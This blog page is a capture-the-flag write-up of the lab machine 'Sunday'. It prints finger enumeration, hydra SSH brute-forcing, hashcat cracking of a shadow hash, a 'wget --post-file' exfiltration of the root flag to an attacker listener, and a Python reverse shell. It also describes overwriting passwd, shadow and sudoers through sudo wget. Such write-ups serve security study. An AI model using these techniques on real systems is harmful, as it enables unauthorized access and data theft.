<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Sunday | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="1.nmap scan  fingerThe finger daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged in users. It can also provi">
<meta property="og:type" content="article">
<meta property="og:title" content="Sunday">
<meta property="og:url" content="http://example.com/2022/07/25/Sunday/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="1.nmap scan  fingerThe finger daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged in users. It can also provi">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/nmapscan.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/useful.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/user.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/backup.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/agent22.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/shadow.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/sammy.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/sammylogin.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/roottxt.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/root1.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/way2.1.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/way2.2.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/way4.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/way5.1.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/way5.2.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/way6.1.png">
<meta property="og:image" content="http://example.com/2022/07/25/Sunday/way6.2.png">
<meta property="article:published_time" content="2022-07-25T09:38:50.000Z">
<meta property="article:modified_time" content="2022-07-25T15:13:16.896Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2022/07/25/Sunday/nmapscan.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-Sunday" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2022/07/25/Sunday/" class="article-date">
  <time class="dt-published" datetime="2022-07-25T09:38:50.000Z" itemprop="datePublished">2022-07-25</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      Sunday
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h4 id="1-nmap-scan"><a href="#1-nmap-scan" class="headerlink" title="1.nmap scan"></a>1.nmap scan</h4><img src="/2022/07/25/Sunday/nmapscan.png">

<h5 id="finger"><a href="#finger" class="headerlink" title="finger"></a>finger</h5><p>The finger daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged in users. It can also provide details about a specific user and when they last logged in and from where.<br>we can use <a href>finger-user-enum</a> to brute force it.</p>
<pre><code>wget http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
perl finger-user-enum.pl -U /usr/share/SecLists/Usernames/Names/names.txt -t 10.10.10.76
######## Scan started at Sun Oct  7 08:57:50 2018 #########
access@10.10.10.76: access No Access User                     &lt; .  .  .  . &gt;..nobody4  SunOS 4.x NFS Anonym               &lt; .  .  .  . &gt;..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              &lt; .  .  .  . &gt;..lp       Line Printer Admin                 &lt; .  .  .  . &gt;..uucp
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         &lt; .  .  .  . &gt;..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..jo                    ???..ann                   ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin                 &lt; .  .  .  . &gt;..
message@10.10.10.76: Login       Name               TTY         Idle    When    Where..smmsp    SendMail Message Sub               &lt; .  .  .  . &gt;..
miof mela@10.10.10.76: Login       Name               TTY         Idle    When    Where..miof                  ???..mela                  ???..
sammy@10.10.10.76: sammy                 pts/2        &lt;Apr 24 12:57&gt; 10.10.14.4          ..
sunny@10.10.10.76: sunny                 pts/3        &lt;Apr 24 10:48&gt; 10.10.14.4          ..
sys@10.10.10.76: sys             ???                         &lt; .  .  .  . &gt;..
zsa zsa@10.10.10.76: Login       Name               TTY         Idle    When    Where..zsa                   ???..zsa                   ???..
######## Scan completed at Sun Oct  7 09:03:50 2018 #########
14 results.
</code></pre>
<p>there are some useless information in it,but sammy and sunny seems useful<br><img src="/2022/07/25/Sunday/useful.png"></p>
<h4 id="2-get-user-access"><a href="#2-get-user-access" class="headerlink" title="2.get user access"></a>2.get user access</h4><p>with sammy and sunny,we can try to enum password<br>use hydra to brute password<br>    hydra -L user.txt -P &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt -I -f  -s 22022 10.10.10.76 ssh<br>and we will get a cred sunny&#x2F;sunday<br>now we can use ssh to login<br><img src="/2022/07/25/Sunday/user.png"><br>we can execute &#x2F;root&#x2F;troll without password<br>Inside &#x2F;backup there’s a copy of a shadow file that is world readable:<br><img src="/2022/07/25/Sunday/backup.png"><br><img src="/2022/07/25/Sunday/agent22.png"><br><img src="/2022/07/25/Sunday/shadow.png"></p>
<p>use hashcat to get passwd</p>
<pre><code>hashcat -m 7400 sunday.hash /usr/share/wordlists/rockyou.txt --force
</code></pre>
<img src="/2022/07/25/Sunday/sammy.png">
and we can login with sammy
<img src="/2022/07/25/Sunday/sammylogin.png">

<h4 id="3-get-root-access"><a href="#3-get-root-access" class="headerlink" title="3.get root access"></a>3.get root access</h4><p>the first way to get root is to use sammy wget to get root.txt<br><img src="/2022/07/25/Sunday/roottxt.png"></p>
<h5 id="way-1"><a href="#way-1" class="headerlink" title="way 1"></a>way 1</h5><p>The easiest way to just get the flag is to take advantage of the –input-file or -i flag on wget. This flag allows you to provide a file with the urls to visit. When it reads the hash, the string will fail to process as a url, and will tell us so in an error message, complete with flag:<br><img src="/2022/07/25/Sunday/root1.png"></p>
<h5 id="way-2"><a href="#way-2" class="headerlink" title="way 2"></a>way 2</h5><p>A second method to exfil the flag is to have wget post the file back to us using <code>--post-file</code>,but python SimpleHTTPServer doesn’t support POST requests<br><img src="/2022/07/25/Sunday/way2.1.png"><br>but in this case,we just need to use nc to get the information<br>    sudo wget –post-file &#x2F;root&#x2F;root.txt <a target="_blank" rel="noopener" href="http://10.10.16.10:8888/">http://10.10.16.10:8888/</a><br><img src="/2022/07/25/Sunday/way2.2.png"></p>
<h5 id="way-3"><a href="#way-3" class="headerlink" title="way 3"></a>way 3</h5><p>because the sunny can execute troll without password<br>we can try to overwrite this file<br>first write a python script</p>
<pre><code>#! /bin/bash
import os
import socket
import subprocess

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((&quot;10.10.16.10&quot;,8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);
</code></pre>
<p>using the -O option, which will allow us to specify a file to write the wget output to, and it will overwrite that file if it already exists</p>
<pre><code>sudo wget http://10.10.16.10/reverse.py -O /root/troll
</code></pre>
<p>but this method may fail because the script reset itself per 5 seconds</p>
<h5 id="way-4"><a href="#way-4" class="headerlink" title="way 4"></a>way 4</h5><p>we can overwrite other files we can execute,such as passwd<br><img src="/2022/07/25/Sunday/way4.png"></p>
<h5 id="way-5-overwrite-shadow"><a href="#way-5-overwrite-shadow" class="headerlink" title="way 5 overwrite shadow"></a>way 5 overwrite shadow</h5><p>make a root user copied from sunny<br>and get it<br><img src="/2022/07/25/Sunday/way5.1.png"><br><img src="/2022/07/25/Sunday/way5.2.png"></p>
<h5 id="way-6"><a href="#way-6" class="headerlink" title="way 6"></a>way 6</h5><p>Overwrite sudoers<br>Let’s change that slightly in a copy on our local host, giving sammy the ability to run su without password:<br><img src="/2022/07/25/Sunday/way6.1.png"><br><img src="/2022/07/25/Sunday/way6.2.png"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2022/07/25/Sunday/" data-id="cl60o2zry0000brcp0i1c13h2" data-title="Sunday" class="article-share-link">Share</a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2022/07/24/Sense/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Sense</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/07/">July 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/07/25/Sunday/">Sunday</a>
          </li>
        
          <li>
            <a href="/2022/07/24/Sense/">Sense</a>
          </li>
        
          <li>
            <a href="/2022/07/22/Grandpa/">Grandpa</a>
          </li>
        
          <li>
            <a href="/2022/07/21/Granny/">Granny</a>
          </li>
        
          <li>
            <a href="/2022/07/19/FriendZone/">FriendZone</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>